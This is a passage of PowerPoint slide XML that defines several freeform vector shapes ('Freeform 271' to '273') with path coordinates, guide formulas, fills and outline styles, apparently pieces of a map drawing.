                    <a:lnTo>
                      <a:pt x="172" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="182"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36138" name="Freeform 271"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2779" y="1989"/>
                <a:ext cx="60" cy="50"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 8 w 60"/>
                  <a:gd name="T1" fmla="*/ 5 h 50"/>
                  <a:gd name="T2" fmla="*/ 15 w 60"/>
                  <a:gd name="T3" fmla="*/ 5 h 50"/>
                  <a:gd name="T4" fmla="*/ 20 w 60"/>
                  <a:gd name="T5" fmla="*/ 3 h 50"/>
                  <a:gd name="T6" fmla="*/ 26 w 60"/>
                  <a:gd name="T7" fmla="*/ 4 h 50"/>
                  <a:gd name="T8" fmla="*/ 30 w 60"/>
                  <a:gd name="T9" fmla="*/ 2 h 50"/>
                  <a:gd name="T10" fmla="*/ 34 w 60"/>
                  <a:gd name="T11" fmla="*/ 2 h 50"/>
                  <a:gd name="T12" fmla="*/ 38 w 60"/>
                  <a:gd name="T13" fmla="*/ 3 h 50"/>
                  <a:gd name="T14" fmla="*/ 41 w 60"/>
                  <a:gd name="T15" fmla="*/ 2 h 50"/>
                  <a:gd name="T16" fmla="*/ 47 w 60"/>
                  <a:gd name="T17" fmla="*/ 5 h 50"/>
                  <a:gd name="T18" fmla="*/ 52 w 60"/>
                  <a:gd name="T19" fmla="*/ 14 h 50"/>
                  <a:gd name="T20" fmla="*/ 50 w 60"/>
                  <a:gd name="T21" fmla="*/ 19 h 50"/>
                  <a:gd name="T22" fmla="*/ 58 w 60"/>
                  <a:gd name="T23" fmla="*/ 21 h 50"/>
                  <a:gd name="T24" fmla="*/ 60 w 60"/>
                  <a:gd name="T25" fmla="*/ 30 h 50"/>
                  <a:gd name="T26" fmla="*/ 55 w 60"/>
                  <a:gd name="T27" fmla="*/ 34 h 50"/>
                  <a:gd name="T28" fmla="*/ 53 w 60"/>
                  <a:gd name="T29" fmla="*/ 36 h 50"/>
                  <a:gd name="T30" fmla="*/ 51 w 60"/>
                  <a:gd name="T31" fmla="*/ 43 h 50"/>
                  <a:gd name="T32" fmla="*/ 52 w 60"/>
                  <a:gd name="T33" fmla="*/ 50 h 50"/>
                  <a:gd name="T34" fmla="*/ 47 w 60"/>
                  <a:gd name="T35" fmla="*/ 50 h 50"/>
                  <a:gd name="T36" fmla="*/ 43 w 60"/>
                  <a:gd name="T37" fmla="*/ 45 h 50"/>
                  <a:gd name="T38" fmla="*/ 37 w 60"/>
                  <a:gd name="T39" fmla="*/ 43 h 50"/>
                  <a:gd name="T40" fmla="*/ 36 w 60"/>
                  <a:gd name="T41" fmla="*/ 38 h 50"/>
                  <a:gd name="T42" fmla="*/ 36 w 60"/>
                  <a:gd name="T43" fmla="*/ 35 h 50"/>
                  <a:gd name="T44" fmla="*/ 31 w 60"/>
                  <a:gd name="T45" fmla="*/ 39 h 50"/>
                  <a:gd name="T46" fmla="*/ 26 w 60"/>
                  <a:gd name="T47" fmla="*/ 38 h 50"/>
                  <a:gd name="T48" fmla="*/ 26 w 60"/>
                  <a:gd name="T49" fmla="*/ 34 h 50"/>
                  <a:gd name="T50" fmla="*/ 24 w 60"/>
                  <a:gd name="T51" fmla="*/ 30 h 50"/>
                  <a:gd name="T52" fmla="*/ 18 w 60"/>
                  <a:gd name="T53" fmla="*/ 29 h 50"/>
                  <a:gd name="T54" fmla="*/ 14 w 60"/>
                  <a:gd name="T55" fmla="*/ 26 h 50"/>
                  <a:gd name="T56" fmla="*/ 11 w 60"/>
                  <a:gd name="T57" fmla="*/ 19 h 50"/>
                  <a:gd name="T58" fmla="*/ 7 w 60"/>
                  <a:gd name="T59" fmla="*/ 20 h 50"/>
                  <a:gd name="T60" fmla="*/ 4 w 60"/>
                  <a:gd name="T61" fmla="*/ 19 h 50"/>
                  <a:gd name="T62" fmla="*/ 0 w 60"/>
                  <a:gd name="T63" fmla="*/ 10 h 5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60"/>
                  <a:gd name="T97" fmla="*/ 0 h 50"/>
                  <a:gd name="T98" fmla="*/ 60 w 60"/>
                  <a:gd name="T99" fmla="*/ 50 h 50"/>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60" h="50">
                    <a:moveTo>
                      <a:pt x="0" y="10"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36139" name="Freeform 272"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2779" y="1989"/>
                <a:ext cx="60" cy="50"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 8 w 60"/>
                  <a:gd name="T1" fmla="*/ 5 h 50"/>
                  <a:gd name="T2" fmla="*/ 15 w 60"/>
                  <a:gd name="T3" fmla="*/ 5 h 50"/>
                  <a:gd name="T4" fmla="*/ 20 w 60"/>
                  <a:gd name="T5" fmla="*/ 3 h 50"/>
                  <a:gd name="T6" fmla="*/ 26 w 60"/>
                  <a:gd name="T7" fmla="*/ 4 h 50"/>
                  <a:gd name="T8" fmla="*/ 30 w 60"/>
                  <a:gd name="T9" fmla="*/ 2 h 50"/>
                  <a:gd name="T10" fmla="*/ 34 w 60"/>
                  <a:gd name="T11" fmla="*/ 2 h 50"/>
                  <a:gd name="T12" fmla="*/ 38 w 60"/>
                  <a:gd name="T13" fmla="*/ 3 h 50"/>
                  <a:gd name="T14" fmla="*/ 41 w 60"/>
                  <a:gd name="T15" fmla="*/ 2 h 50"/>
                  <a:gd name="T16" fmla="*/ 47 w 60"/>
                  <a:gd name="T17" fmla="*/ 5 h 50"/>
                  <a:gd name="T18" fmla="*/ 52 w 60"/>
                  <a:gd name="T19" fmla="*/ 14 h 50"/>
                  <a:gd name="T20" fmla="*/ 50 w 60"/>
                  <a:gd name="T21" fmla="*/ 19 h 50"/>
                  <a:gd name="T22" fmla="*/ 58 w 60"/>
                  <a:gd name="T23" fmla="*/ 21 h 50"/>
                  <a:gd name="T24" fmla="*/ 60 w 60"/>
                  <a:gd name="T25" fmla="*/ 30 h 50"/>
                  <a:gd name="T26" fmla="*/ 55 w 60"/>
                  <a:gd name="T27" fmla="*/ 34 h 50"/>
                  <a:gd name="T28" fmla="*/ 53 w 60"/>
                  <a:gd name="T29" fmla="*/ 36 h 50"/>
                  <a:gd name="T30" fmla="*/ 51 w 60"/>
                  <a:gd name="T31" fmla="*/ 43 h 50"/>
                  <a:gd name="T32" fmla="*/ 52 w 60"/>
                  <a:gd name="T33" fmla="*/ 50 h 50"/>
                  <a:gd name="T34" fmla="*/ 47 w 60"/>
                  <a:gd name="T35" fmla="*/ 50 h 50"/>
                  <a:gd name="T36" fmla="*/ 43 w 60"/>
                  <a:gd name="T37" fmla="*/ 45 h 50"/>
                  <a:gd name="T38" fmla="*/ 37 w 60"/>
                  <a:gd name="T39" fmla="*/ 43 h 50"/>
                  <a:gd name="T40" fmla="*/ 36 w 60"/>
                  <a:gd name="T41" fmla="*/ 38 h 50"/>
                  <a:gd name="T42" fmla="*/ 36 w 60"/>
                  <a:gd name="T43" fmla="*/ 35 h 50"/>
                  <a:gd name="T44" fmla="*/ 31 w 60"/>
                  <a:gd name="T45" fmla="*/ 39 h 50"/>
                  <a:gd name="T46" fmla="*/ 26 w 60"/>
                  <a:gd name="T47" fmla="*/ 38 h 50"/>
                  <a:gd name="T48" fmla="*/ 26 w 60"/>
                  <a:gd name="T49" fmla="*/ 34 h 50"/>
                  <a:gd name="T50" fmla="*/ 24 w 60"/>
                  <a:gd name="T51" fmla="*/ 30 h 50"/>
                  <a:gd name="T52" fmla="*/ 18 w 60"/>
                  <a:gd name="T53" fmla="*/ 29 h 50"/>
                  <a:gd name="T54" fmla="*/ 14 w 60"/>
                  <a:gd name="T55" fmla="*/ 26 h 50"/>
                  <a:gd name="T56" fmla="*/ 11 w 60"/>
                  <a:gd name="T57" fmla="*/ 19 h 50"/>
                  <a:gd name="T58" fmla="*/ 7 w 60"/>
                  <a:gd name="T59" fmla="*/ 20 h 50"/>
                  <a:gd name="T60" fmla="*/ 4 w 60"/>
                  <a:gd name="T61" fmla="*/ 19 h 50"/>
                  <a:gd name="T62" fmla="*/ 0 w 60"/>
                  <a:gd name="T63" fmla="*/ 10 h 5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60"/>
                  <a:gd name="T97" fmla="*/ 0 h 50"/>
                  <a:gd name="T98" fmla="*/ 60 w 60"/>
                  <a:gd name="T99" fmla="*/ 50 h 50"/>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60" h="50">
                    <a:moveTo>
                      <a:pt x="0" y="10"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36140" name="Freeform 273"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2795" y="1940"/>
                <a:ext cx="59" cy="68"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 59 w 59"/>
                  <a:gd name="T1" fmla="*/ 11 h 68"/>
                  <a:gd name="T2" fmla="*/ 56 w 59"/>
                  <a:gd name="T3" fmla="*/ 20 h 68"/>
                  <a:gd name="T4" fmla="*/ 51 w 59"/>
                  <a:gd name="T5" fmla="*/ 22 h 68"/>
                  <a:gd name="T6" fmla="*/ 54 w 59"/>
                  <a:gd name="T7" fmla="*/ 25 h 68"/>
                  <a:gd name="T8" fmla="*/ 56 w 59"/>
                  <a:gd name="T9" fmla="*/ 27 h 68"/>
                  <a:gd name="T10" fmla="*/ 53 w 59"/>
                  <a:gd name="T11" fmla="*/ 33 h 68"/>
                  <a:gd name="T12" fmla="*/ 50 w 59"/>
                  <a:gd name="T13" fmla="*/ 39 h 68"/>
                  <a:gd name="T14" fmla="*/ 43 w 59"/>
                  <a:gd name="T15" fmla="*/ 39 h 68"/>
                  <a:gd name="T16" fmla="*/ 39 w 59"/>
                  <a:gd name="T17" fmla="*/ 41 h 68"/>
                  <a:gd name="T18" fmla="*/ 41 w 59"/>
                  <a:gd name="T19" fmla="*/ 45 h 68"/>
                  <a:gd name="T20" fmla="*/ 43 w 59"/>
                  <a:gd name="T21" fmla="*/ 52 h 68"/>
                  <a:gd name="T22" fmla="*/ 41 w 59"/>
                  <a:gd name="T23" fmla="*/ 57 h 68"/>
                  <a:gd name="T24" fmla="*/ 40 w 59"/>
                  <a:gd name="T25" fmla="*/ 59 h 68"/>
                  <a:gd name="T26" fmla="*/ 38 w 59"/>
                  <a:gd name="T27" fmla="*/ 62 h 68"/>
                  <a:gd name="T28" fmla="*/ 40 w 59"/>
                  <a:gd name="T29" fmla="*/ 65 h 68"/>
                  <a:gd name="T30" fmla="*/ 34 w 59"/>
                  <a:gd name="T31" fmla="*/ 68 h 68"/>
                  <a:gd name="T32" fmla="*/ 36 w 59"/>
                  <a:gd name="T33" fmla="*/ 63 h 68"/>
                  <a:gd name="T34" fmla="*/ 31 w 59"/>
                  <a:gd name="T35" fmla="*/ 54 h 68"/>
                  <a:gd name="T36" fmla="*/ 25 w 59"/>
                  <a:gd name="T37" fmla="*/ 51 h 68"/>
                  <a:gd name="T38" fmla="*/ 22 w 59"/>
                  <a:gd name="T39" fmla="*/ 52 h 68"/>
                  <a:gd name="T40" fmla="*/ 18 w 59"/>
